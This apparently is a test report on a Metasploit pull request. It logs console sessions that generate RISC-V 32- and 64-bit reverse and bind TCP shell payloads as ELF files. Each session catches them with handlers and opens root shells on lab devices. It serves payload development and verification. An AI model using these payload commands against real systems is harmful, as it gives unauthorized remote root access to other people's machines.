Collab/riscv staged payloads

[bwatters-r7]

I think I hit everything requested:

RISCV32LE Reverse TCP on Linux buildroot 6.18.7

msf payload(linux/riscv32le/shell/reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf payload(linux/riscv32le/shell/reverse_tcp) > set lport 4568
lport => 4568
msf payload(linux/riscv32le/shell/reverse_tcp) > generate -f elf -o revtcp_riscv32le_4568.elf
[*] Writing 316 bytes to revtcp_riscv32le_4568.elf...
msf payload(linux/riscv32le/shell/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf payload(linux/riscv32le/shell/reverse_tcp) > 
[*] Started reverse TCP handler on 10.5.135.201:4568 
[*] Transmitting stage length value... (128 bytes)
[*] Sending stage (128 bytes) to 10.5.134.138
[*] Command shell session 1 opened (10.5.135.201:4568 -> 10.5.134.138:52148) at 2026-05-27 12:55:31 -0500

msf payload(linux/riscv32le/shell/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

pwd
/root
uname -a
Linux buildroot 6.18.7 #1 SMP Fri Apr 17 20:11:28 CDT 2026 riscv32 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root),10(wheel)
cat /proc/cpuinfo
processor	: 0
hart		: 0
isa		: rv32imafdch_zicbom_zicbop_zicboz_ziccrse_zicntr_zicsr_zifencei_zihintntl_zihintpause_zihpm_zaamo_zalrsc_zawrs_zfa_zca_zcd_zcf_zba_zbb_zbc_zbs_sstc_svadu_svvptc
mmu		: sv32
mvendorid	: 0x0
marchid		: 0x0
mimpid		: 0x0
hart isa	: rv32imafdch_zicbom_zicbop_zicboz_ziccrse_zicntr_zicsr_zifencei_zihintntl_zihintpause_zihpm_zaamo_zalrsc_zawrs_zfa_zca_zcd_zcf_zba_zbb_zbc_zbs_sstc_svadu_svvptc

RISCV32LE Bind TCP on Linux buildroot 6.18.7

msf payload(linux/riscv32le/shell/bind_tcp) > set rhost 10.5.134.138
rhost => 10.5.134.138
msf payload(linux/riscv32le/shell/bind_tcp) > set lport 5309
lport => 5309
msf payload(linux/riscv32le/shell/bind_tcp) > generate -f elf -o btcp_riscv32_5309.elf
[*] Writing 348 bytes to btcp_riscv32_5309.elf...
msf payload(linux/riscv32le/shell/bind_tcp) > to_handler
[*] Payload Handler Started as Job 1
msf payload(linux/riscv32le/shell/bind_tcp) > 
[*] Started bind TCP handler against 10.5.134.138:5309
[*] Transmitting stage length value... (128 bytes)
[*] Sending stage (128 bytes) to 10.5.134.138
[*] Command shell session 2 opened (10.5.135.201:40785 -> 10.5.134.138:5309) at 2026-05-27 15:30:17 -0500

msf payload(linux/riscv32le/shell/bind_tcp) > sessions -i 2
[*] Starting interaction with 2...

id
uid=0(root) gid=0(root) groups=0(root),10(wheel)
uname -a
Linux buildroot 6.18.7 #1 SMP Fri Apr 17 20:11:28 CDT 2026 riscv32 GNU/Linux
cat /proc/cpuinfo
processor	: 0
hart		: 0
isa		: rv32imafdch_zicbom_zicbop_zicboz_ziccrse_zicntr_zicsr_zifencei_zihintntl_zihintpause_zihpm_zaamo_zalrsc_zawrs_zfa_zca_zcd_zcf_zba_zbb_zbc_zbs_sstc_svadu_svvptc
mmu		: sv32
mvendorid	: 0x0
marchid		: 0x0
mimpid		: 0x0
hart isa	: rv32imafdch_zicbom_zicbop_zicboz_ziccrse_zicntr_zicsr_zifencei_zihintntl_zihintpause_zihpm_zaamo_zalrsc_zawrs_zfa_zca_zcd_zcf_zba_zbb_zbc_zbs_sstc_svadu_svvptc

exit
[*] 10.5.134.138 - Command shell session 2 closed.
msf payload(linux/riscv32le/shell/bind_tcp) > 

RISCV64LE Reverse TCP on milkv MARS

msf payload(linux/riscv64le/shell/reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf payload(linux/riscv64le/shell/reverse_tcp) > set lport 4568
lport => 4568
msf payload(linux/riscv64le/shell/reverse_tcp) > generate -f elf -o rtcp_riscv64_4568.elf
[*] Writing 344 bytes to rtcp_riscv64_4568.elf...
msf payload(linux/riscv64le/shell/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 3
msf payload(linux/riscv64le/shell/reverse_tcp) > 
[*] Started reverse TCP handler on 10.5.135.201:4568 
[*] Transmitting stage length value... (128 bytes)
[*] Sending stage (128 bytes) to 10.5.132.240
[*] Command shell session 3 opened (10.5.135.201:4568 -> 10.5.132.240:47836) at 2026-05-27 15:33:42 -0500

msf payload(linux/riscv64le/shell/reverse_tcp) > sessions -i 3
[*] Starting interaction with 3...

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux milkv 5.15.0 #1 SMP Mon Nov 13 18:56:24 CST 2023 riscv64 GNU/Linux
cat /proc/cpuinfo
processor	: 0
hart		: 1
isa		: rv64imafdc
mmu		: sv39
isa-ext		: 
uarch		: sifive,u74-mc

processor	: 1
hart		: 2
isa		: rv64imafdc
mmu		: sv39
isa-ext		: 
uarch		: sifive,u74-mc

processor	: 2
hart		: 3
isa		: rv64imafdc
mmu		: sv39
isa-ext		: 
uarch		: sifive,u74-mc

processor	: 3
hart		: 4
isa		: rv64imafdc
mmu		: sv39
isa-ext		: 
uarch		: sifive,u74-mc

exit
[*] 10.5.132.240 - Command shell session 3 closed.
msf payload(linux/riscv64le/shell/reverse_tcp) > 

RISCV64LE Bind TCP on milkv MARS

msf payload(linux/riscv64le/shell/bind_tcp) > show options

Module options (payload/linux/riscv64le/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  5309             yes       The listen port
   RHOST  10.5.132.240     no        The target address
   SHELL  /bin/sh          yes       The shell to execute.


View the full module info with the info, or info -d command.

msf payload(linux/riscv64le/shell/bind_tcp) > to_handler
[*] Payload Handler Started as Job 6
msf payload(linux/riscv64le/shell/bind_tcp) > 
[*] Started bind TCP handler against 10.5.132.240:5309
[*] Transmitting stage length value... (128 bytes)
[*] Sending stage (128 bytes) to 10.5.132.240
[*] Command shell session 6 opened (10.5.132.121:39051 -> 10.5.132.240:5309) at 2026-05-27 15:43:12 -0500

msf payload(linux/riscv64le/shell/bind_tcp) > sessions -i 6
[*] Starting interaction with 6...

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux milkv 5.15.0 #1 SMP Mon Nov 13 18:56:24 CST 2023 riscv64 GNU/Linux
cat /proc/cpuinfo
processor	: 0
hart		: 1
isa		: rv64imafdc
mmu		: sv39
isa-ext		: 
uarch		: sifive,u74-mc

processor	: 1
hart		: 2
isa		: rv64imafdc
mmu		: sv39
isa-ext		: 
uarch		: sifive,u74-mc

processor	: 2
hart		: 3
isa		: rv64imafdc
mmu		: sv39
isa-ext		: 
uarch		: sifive,u74-mc

processor	: 3
hart		: 4
isa		: rv64imafdc
mmu		: sv39
isa-ext		: 
uarch		: sifive,u74-mc

exit
[*] 10.5.132.240 - Command shell session 6 closed.
msf payload(linux/riscv64le/shell/bind_tcp) >